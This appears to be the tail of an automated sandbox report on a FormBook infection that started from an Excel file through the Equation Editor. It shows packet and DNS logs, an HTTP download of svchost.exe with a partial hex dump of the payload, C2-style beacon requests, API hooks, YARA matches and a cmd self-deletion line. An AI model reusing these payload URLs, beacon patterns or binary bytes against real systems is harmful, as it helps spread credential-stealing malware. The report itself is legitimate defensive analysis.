                                                                                                                                                    Nov 26, 2020 09:03:43.462771893 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.463511944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463536024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463547945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463562012 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463582039 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463598013 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.465749025 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465779066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465785027 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465789080 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465792894 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688174009 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688205957 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688222885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688239098 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688255072 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688266039 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688270092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688287020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688298941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688302994 CET8049165103.125.191.5192.168.2.22

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 26, 2020 09:03:41.977698088 CET5219753192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:03:42.049458981 CET53521978.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:42.049945116 CET5219753192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:03:42.085334063 CET53521978.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:04:47.181237936 CET5309953192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET53530998.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:07.648457050 CET5283853192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET53528388.8.8.8192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:05:27.941457033 CET6120053192.168.2.228.8.8.8
                                                                                                                                                    Nov 26, 2020 09:05:27.992831945 CET53612008.8.8.8192.168.2.22

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Nov 26, 2020 09:03:41.977698088 CET192.168.2.228.8.8.80x5142Standard query (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:03:42.049945116 CET192.168.2.228.8.8.80x5142Standard query (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.euA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.181237936 CET192.168.2.228.8.8.80xa14dStandard query (0)www.affinitymotorsales.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.648457050 CET192.168.2.228.8.8.80xccffStandard query (0)www.setyourhead.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:27.941457033 CET192.168.2.228.8.8.80x2e78Standard query (0)www.akmh.proA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Nov 26, 2020 09:03:42.049458981 CET8.8.8.8192.168.2.220x5142No error (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:03:42.085334063 CET8.8.8.8192.168.2.220x5142No error (0)workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu103.125.191.5A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET8.8.8.8192.168.2.220xa14dNo error (0)www.affinitymotorsales.comaffinitymotorsales.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:04:47.240686893 CET8.8.8.8192.168.2.220xa14dNo error (0)affinitymotorsales.com216.130.188.93A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET8.8.8.8192.168.2.220xccffNo error (0)www.setyourhead.comsetyourhead.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:07.687747955 CET8.8.8.8192.168.2.220xccffNo error (0)setyourhead.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                    Nov 26, 2020 09:05:27.992831945 CET8.8.8.8192.168.2.220x2e78Name error (3)www.akmh.prononenoneA (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
                                                                                                                                                    • www.affinitymotorsales.com
                                                                                                                                                    • www.setyourhead.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.2249165103.125.191.580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:03:42.330790997 CET1OUTGET /worksdoc/svchost.exe HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                    Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Nov 26, 2020 09:03:42.558485985 CET2INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 26 Nov 2020 08:03:38 GMT
                                                                                                                                                    Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                    Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT
                                                                                                                                                    ETag: "de000-5b4f69ba08c46"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 909312
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e e5 be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d4 0d 00 00 0a 00 00 00 00 00 00 1e f3 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 00 4b 00 00 00 00 00 0e 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 d3 0d 00 00 20 00 00 00 d4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 00 0e 00 00 08 00 00 00 d6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 de 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 6f 0b 00 08 83 02 00 03 00 00 00 31 00 00 06 f8 6a 02 00 d0 04 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 05 00 13 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a c9 00 00 00 20 fa 1b 25 b4 20 e0 3a 01 ac 61 25 0c 1d 5e 45 07 00 00 00 05 00 00 00 a9 00 00 00 4f 00 00 00 d0 ff ff ff 1f 00 00 00 99 00 00 00 7d 00 00 00 38 a4 00 00 00 28 03 00 00 06 0b 07 2d 08 20 aa a8 23 fc 25 2b 06 20 eb 5c c8 de 25 26 2b b6 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 2d 58 ab 08 25 2b 06 20 64 13 ed 55 25 26 08 20 2a ba e0 05 5a 61 2b 86 06 72 29 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2c 08 20 25 c7 bf 5f 25 2b 06 20 c0 c9 bb 2a 25 26 08 20 d9 02 38 4b 5a 61 38 58 ff ff ff 72 4d 00 00 70 28 10 00 00 06 08 20 a6 ef a1 bc 5a 20 58 2c c2 78 61 38 3c ff ff ff 14 28 0c 00 00 06 20 ca 8a 29 b0 38 2c ff ff ff 14 fe 06 07 00 00 06 73 1d 00 00 0a 28 11 00 00 06 25 17 28 12 00 00 06 14 28 13 00 00 06 2a 00 13 30 03 00 0b 00 00 00 01 00 00 11 7f 01 00 00 04 28 27 00 00 06 2a 00 1b 30 05 00 4c 02 00 00 03 00 00 11 02 75 03 00 00 01 0a 06 3a 99 00 00 00 20 e5 fb d6 35 20 58 bd 35 1e 61 25 0b 1f 0e 5e 45 0e 00 00 00 05 00 00 00 8b 00 00 00 1f 00 00 00 de 00 00 00 b3 ff ff ff 7a 01 00 00 f7 00 00 00 67 00 00 00 5f 01 00 00 4c 00
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_P @ @@K H.text$ `.rsrc@@.reloc @BHo1j0(*0rprp((: % :a%^EO}8(- #%+ \%&+((rp(, -X%+ dU%& *Za+r)p((, %_%+ *%& 8KZa8XrMp( Z X,xa8<( )8,s(%((*0('*0Lu: 5 X5a%^Ezg_L


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.2249166216.130.188.9380C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:04:47.360749960 CET949OUTGET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1
                                                                                                                                                    Host: www.affinitymotorsales.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 26, 2020 09:04:47.465672016 CET950INHTTP/1.1 302 Found
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Content-length: 0
                                                                                                                                                    Location: https://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==
                                                                                                                                                    Connection: close


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 26, 2020 09:05:07.705564022 CET950OUTGET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1
                                                                                                                                                    Host: www.setyourhead.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 26, 2020 09:05:07.821191072 CET951INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Thu, 26 Nov 2020 08:05:07 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "5fb7c9ca-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                    PeekMessageAINLINEexplorer.exe
                                                                                                                                                    PeekMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageWINLINEexplorer.exe
                                                                                                                                                    GetMessageAINLINEexplorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: USER32.dll
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1
                                                                                                                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE1
                                                                                                                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 2448 Parent PID: 584

                                                                                                                                                    General

                                                                                                                                                    Start time:09:02:53
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: EQNEDT32.EXE PID: 2536 Parent PID: 584

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:13
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:543304 bytes
                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Analysis Process: vbc.exe PID: 2884 Parent PID: 2536

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:18
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:909312 bytes
                                                                                                                                                    MD5 hash:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 25%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    Analysis Process: RegSvcs.exe PID: 2344 Parent PID: 2884

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:27
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                    File size:45216 bytes
                                                                                                                                                    MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: explorer.exe PID: 1388 Parent PID: 2344

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:29
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Analysis Process: raserver.exe PID: 3024 Parent PID: 1388

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:38
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Imagebase:0x9a0000
                                                                                                                                                    File size:101888 bytes
                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                    Analysis Process: cmd.exe PID: 3004 Parent PID: 3024

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:42
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                    Imagebase:0x49d30000
                                                                                                                                                    File size:302592 bytes
                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >